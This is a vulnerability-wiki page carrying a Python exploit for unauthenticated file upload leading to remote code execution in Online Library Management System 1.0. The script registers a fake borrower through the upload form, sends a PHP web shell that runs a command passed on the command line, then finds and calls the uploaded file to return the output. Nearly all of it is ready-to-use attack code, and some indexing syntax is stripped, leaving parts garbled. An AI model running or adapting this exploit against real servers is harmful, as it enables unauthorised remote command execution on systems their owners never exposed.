免费、自由、人人可编辑的漏洞库
,
# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated) # Date: 23-06-2021 # Exploit Author: Berk Can Geyikci # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip # Version: 1.0 # Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28 # Exploit Tested Using: Python 3.8.6 ''' Steps To Produce: 1)Click Books 2)Select one book and click Read more 3)Get the book id from url #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678 4)Execute Python Script with URL, Book id and Command ''' ''' Import required modules: ''' import sys, hashlib, requests import urllib import time import random try: #settings target_url = sys.argv1 book_id = sys.argv2 command = sys.argv3 except IndexError: print("- usage: %s <target> <book_id> <command>" % sys.argv0) print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv0) sys.exit() url = target_url+"/ols/proccess.php?action=add" session = requests.Session() session.get(target_url+"/ols") session_cookies = session.cookies php_cookie = session.cookies.get_dict()'PHPSESSID'.strip() print("Getting Session Cookie= "+php_cookie) random_borrower_id = random.randint(0,999999) #Headers to upload php headers = { "Accept-Encoding": "gzip, deflate", "Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq", "Upgrade-Insecure-Requests": "1", "Connection": "close", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Cookie": "PHPSESSID="+php_cookie } req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers) data = "------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n15243678\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BorrowerId\"\r\n\r\n"+str(random_borrower_id)+"\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Firstname\"\r\n\r\ndummy_firstname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Lastname\"\r\n\r\ndummy_lastname\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"deptid\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"MiddleName\"\r\n\r\ndummy_middlename\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"Address\"\r\n\r\ndummy_address\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"optionsRadios\"\r\n\r\nMale\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"ContactNo\"\r\n\r\n1\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"CourseYear\"\r\n\r\n2021\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BUsername\"\r\n\r\ndummy_username\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"BPassword\"\r\n\r\ndummy_\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"picture\"; filename=\"rcepoc_"+str(random_borrower_id)+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\n\r\n\r\n\r\necho shell_exec('"+command+"');\r\n\r\n\r\n\r\n?>\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq\r\nContent-Disposition: form-data; name=\"save\"\r\n\r\n\r\n------WebKitFormBoundaryBA3sFU893qYE7jKq--\r\n" req = requests.post(url, headers=headers, data=data) print("Uploading file...") req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers) #print(req.text) req = requests.get(target_url+"/ols/borrower/", headers=headers) #print(req.text) req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers) reqq = req.text #print(reqq) reqqq = reqq.find(str(random_borrower_id)) command_result = reqqreqqq-21:reqqq+10 req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers) print("Command Result = "+req.text)
PWNWIK.COM